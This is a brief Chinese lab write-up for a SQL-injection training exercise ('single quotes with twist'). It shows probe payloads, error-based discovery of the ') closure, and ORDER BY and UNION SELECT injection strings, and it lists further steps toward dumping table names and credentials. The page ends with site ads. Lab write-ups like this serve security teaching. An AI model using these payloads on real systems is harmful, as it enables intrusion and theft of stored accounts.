题目:GET - Error based - Single quotes with twist
基于错误的单引号GET型变形注入
?id=1 )and 1=2--+
?id=1 "and 1=2--+
?id=1 %and 1=2--+
上面都没反应
?id=1 'and 1=2--+
跳出 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') LIMIT 0,1' at line 1
提示我们语法错误,说明可注入
再看 near ") LIMIT 0,1 ' at line 1
说明可用 ') 来闭合
输入
?id=1 ')and 1=2--+
?id=1 ')and 1=1--+
注入成功
查字段
?id=1 order by 3--+
查可显示字段
?id=-1 union select 1,2,3--+
查数据库名与版本
查表名
查列名
查账密
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】